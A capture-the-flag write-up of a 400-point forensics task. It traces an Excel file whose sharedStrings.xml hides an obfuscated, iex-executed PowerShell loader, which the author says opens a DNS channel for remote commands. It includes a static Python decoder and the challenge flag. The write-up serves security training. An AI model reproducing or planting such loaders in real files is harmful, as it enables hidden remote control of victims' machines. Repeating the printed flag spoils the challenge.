S21SEC [DCS17CTF] – Finlandia

Hi mates,

During my spare time I have tried some tasks from DSC17 CTF by S21sec. I will comment here on those I found more difficult or fun. FBCTF was the platform, so from here on the task names are the associated countries.

Finlandia – 400 points 

I have a suspicious Excel file, as the title says, and the first thing to do is uncompress or extract its contents. So use binwalk, rename it as a zip, or whatever. Inside we have a VBA bin file. We can use oledump.py to view its contents.

After some time trying to decompress and decode the VBA bin file, it seemed to be a dead end, so I started to search for other files. I saw one in particular, sharedStrings.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('83G116G97B114E1...[]...C112B116B98B108C111H99H107C32G123H1'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>

So, this is obfuscated PowerShell code; let's try to see its contents.
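The decoding step can be done statically, without ever letting the cell reach iex. The following is an added example, not code from the original post: it reads sharedStrings.xml out of a workbook and reverses the Split / [Char][Int] / -Join chain shown above. The function names, the standard xl/sharedStrings.xml location and the sample workbook built inline are assumptions made for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
# Matches ('<char codes and separators>'.SplIt('<separators>') in any letter case.
PATTERN = re.compile(r"\(\s*'([0-9A-Za-z]+)'\s*\.split\(\s*'([^']+)'\s*\)", re.I)

def shared_strings(xlsx_bytes):
    """Return the text of every <t> element in xl/sharedStrings.xml."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return [t.text or "" for t in root.iterfind(".//m:t", NS)]

def decode_split_chars(text):
    """Rebuild the hidden script from the char-code blob; nothing is executed.
    Returns None when the cell does not contain the Split pattern."""
    m = PATTERN.search(text)
    if not m:
        return None
    blob, delims = m.groups()
    # In the sample every letter of the Split argument acts as a separator,
    # so split on any of them rather than on the whole string.
    codes = re.split("[" + re.escape(delims) + "]", blob)
    return "".join(chr(int(c)) for c in codes if c)

def make_sample(script, delims="BHECG"):
    """Build a constructed workbook whose only shared string hides `script`."""
    blob = "".join(str(ord(ch)) + delims[i % len(delims)]
                   for i, ch in enumerate(script))[:-1]
    cell = "('%s'.SplIt('%s')|%%{([Char][Int]$_)} )-Join''|iex|out-null" % (blob, delims)
    xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<sst xmlns="%s" count="1" uniqueCount="1"><si><t>%s</t></si></sst>'
           % (NS["m"], cell))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/sharedStrings.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed sample, not the challenge file.
    sample = make_sample("Write-Output 'constructed sample'")
    for cell in shared_strings(sample):
        print(decode_split_chars(cell))
```

To use it on a real file, pass the workbook's bytes to shared_strings() instead of the constructed sample.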

It creates a DNS client to pass commands on PowerShell. The flag is «f25a2fc72690b780b2a14e140ef6a9e0».
